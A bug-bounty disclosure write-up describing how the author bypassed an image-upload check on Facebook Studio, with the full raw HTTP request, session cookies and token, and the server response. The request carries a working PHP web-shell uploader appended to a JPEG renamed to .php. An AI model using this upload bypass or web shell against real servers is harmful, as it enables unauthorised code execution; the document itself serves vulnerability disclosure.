Facebook Studio – Bypassing FileUpload

Recently few days ago, I reported this vulnerabilities to Facebook which exist on the Facebook Studio. With the help of the vulnerabilities I was able to upload a malicious files to the Studio server.

The vulnerabilities exist on the  Campaign Assets while submitting our Work.

I directly tried to upload a file ( image or any malicious file) I got an error message ” Images must be 619×348″ so I looked into the property : 

File Format: .jpg, .gif, or .png
Filesize: Under 300k
Dimensions: 619×348

Then I created an image with the same attributes which was required by the application. Then I started uploading and modified the file extension to .php from .jpg and added a malicious file uploader code in the end of the attached image.

POST /gallery/updateImage/16ad8368b831c92344979d84a98aea42 HTTP/1.1
Host: www.facebook-studio.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.facebook-studio.com/gallery/submit/16ad8368b831c92344979d84a98aea42
Cookie: AWSELB=516B29F90C00AC629A79701F002D439320495BE9403BC06E19BA094F6B6A2F4701E9897D28249413D9CDD59A6D0798056B20384748CC90168BC4BEAB5CACC1BD182B09DA32; PHPSESSID=1iudc9s51togs4v14prr5rqqb7; _ga=GA1.2.1741392290.1419864188; _gat=1; fbToken=3faa3eeacff143b2879c172d2103e487e9056c18s%3A234%3A%22access_token%3DCAABrMxWAZCkwBABctHeNYFzj4anT7qqdgla6nFw4UrqKNhUtEpsFPnaPbHiTb9LHlDuOPEbyM8sJUf1bQrIRAXWt5R9jG79VfeURlpqg9W8EfadEEPnM7XzXSIm48VLAz9ddBAMsxgKyP07EZCtctqqxQa9YR9YYvk1jfjOr8r46kZCUSxcVBtX9EHFn7i9LrFmgGMQNIQDa6yd1GWi%26expires%3D%22%3B; YII_CSRF_TOKEN=e26759ac858a50d8c6d9a7fe51176f9bb51623d7s%3A40%3A%222d8518ff24c632dabee425ac55be83f040b540c7%22%3B
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------40249275220408021321998143804
Content-Length: 119868
-----------------------------40249275220408021321998143804
Content-Disposition: form-data; name="YII_CSRF_TOKEN"

2d8518ff24c632dabee425ac55be83f040b540c7
—————————–40249275220408021321998143804
Content-Disposition: form-data; name=”ajax”

gallery-form
—————————–40249275220408021321998143804
Content-Disposition: form-data; name=”Submission[image]”; filename=”lol.php”
Content-Type: image/jpeg

ÿØÿà

<?php echo ‘<b><br><br>’.php_uname().'<br></b>’; echo ‘<form action=”” method=”post” enctype=”multipart/form-data” name=”uploader” id=”uploader”>’; echo ‘<input type=”file” name=”file” size=”50″><input name=”_upl” type=”submit” id=”_upl” value=”Upload”></form>’; if( $_POST[‘_upl’] == “Upload” ) { if(@copy($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’])) { echo ‘<b>credits : http://nareshlamgade.com.np/</b><br><br>’; } else { echo ‘<b>Upload Sucess !!!</b><br><br>’; } } ?>

—————————–211083381219672852071391952699–

The response  :


HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Mon, 29 Dec 2014 09:08:31 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 83
Connection: keep-alive
SUCCESS::https://www.facebook-studio.com/fbassets/submissions/77687/thumb/lol.php::


Then i reported the issue to the Facebook with a pretty good hope but it was not for a long time. They replied with a duplication